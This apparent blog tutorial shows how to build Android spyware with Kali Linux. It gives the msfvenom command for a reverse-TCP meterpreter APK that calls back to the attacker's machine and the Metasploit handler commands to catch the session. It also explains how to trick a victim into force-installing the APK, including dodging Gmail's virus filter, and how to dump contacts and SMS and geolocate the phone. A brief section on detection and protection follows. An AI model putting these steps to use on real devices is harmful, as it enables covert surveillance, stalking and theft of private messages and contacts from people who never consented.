What if I tell you, your messages, chats, webcam recordings can be forwarded to a third party without your consent for any malicious purpose? Yes, you have to believe it, buddy, it is easy. โ€˜Spywareโ€™ makes it possible. In this article, we will discuss spyware and how you can create your own spyware to monitor any android phone using Kali Linux in less than 30 minutes.

Pre Requisites

What is Spyware?

Spyware, the software with malicious intent to enter into your system and track the activities and forward these activities to the 3rd party without even letting you know about the same.

Working of Spyware involves 3 steps;

  1. Enter: Entering the computer or mobile system via installation package, any malicious image, or even through any website.
  2. Track: When the package starts working, the log of activities tracked in the background. Everything happening on the system gets recorded in the logs either though keylogger, or tracker.
  3. Send: All the information recorded by the malicious software now gets forwarded to the third party. This third party can be an attacker or like these days company use their own tracking mechanisms for their employees too.

Msfvenom

We have already discussed the Metasploit framework, msfvenom is a utility used to generate shell scripts that are part of Metasploit.

Learn how to Hack Windows 7 machine using metasploit

Kali Linux machine IP Address

This is an important point. Since we are using VMWARE so by default we might be on NAT network mode as in my case. (I have the official Kali Linux from offensive security) To change the network mode to the bridge. Now the VM machine connected to your network comes in the common network as that of the phone.

L HOST: Listener host, the IP address of attacker machine.

L PORT: Listener port, the port listening to compromised victim.

Steps to create your own spyware and hack the android phone:

Creating a spyware for android

Open your Kali machine terminal and use the msfvenom to create an exploit for the android phone. Use the following command

msfvenom -p android/meterpreter/reverse_tcp LHOST=(IP ADDRESS) LPORT=4444 R >hackyourphone.apk
create your own spyware and hack the android phone

Deploy the spyware

  1. You can find the hackd.apk in the user directory which is inside your home directory
  2. The step requires some skills to deploy and install the apk into the victimโ€™s mobile. First you need to send this file to the victimโ€™ mobile phone. Remember Gmail will not allow the file as attachment as it has already detected this as a virus. Either use google drive or host on any system or url to share. The step requires some social engineering skills
  3. Even the latest android systems may stop the installation and ask to report the file as it may be dangerous. So forceful installation required here.
  4. Once the file is installed, now go back to the terminal and use the command โ€˜msfconsoleโ€™ to open Metasploit framework.

Launching the Exploit

how to launch exploit using metasploit and msfvenom

Open the multi/handler to launch the exploit. Use following commands:

msf  > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST (ip address)
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

When user opens the app the exploit will start doing its job and BOOM.

Now you can try some of these commands to dump data from the phone:

  • dump_contacts: Extract all the contacts from the phone
  • geolocate: Used to locate the lost phone but only if the malicious file is installed on that device.
  • dump_sms: Get the messages from the device.

How to detect if the phone is infected with spyware?

Android detecting spyware

When it comes to detecting the spyware, older malicious codes can be easily detected these days but when we talk about any sophisticated spyware like Pegasus, it is very difficult for a layman to detect the same. But still, some basic observations can help to determine if the phone is affected by spyware or not. Some of the observations are listed below:

  1. Overheating even when the phone is off.
  2. Battery drains to fast than usual.
  3. Slower response time
  4. Track your data usage to check if the unusual traffic is there or not. Also you can observe the difference between the data usage and bandwidth before & after the phone was affected.
  5. Too many ads

How to remove the spyware from my phone?

The easiest way to remove the spyware is by factory reset as most Spywares get removed after the reset. But this will also remove all your data so better to have a backup.

How you can protect yourself from such Spywares including PEGASUS?

Apps needing Permissions in phone
  • Keep all your apps updated
  • Never use unofficial installer packages
  • Never click on any unknown link
  • Less permissions to apps, lower privileges, higher security
  • You can also use the antivirus software for the phone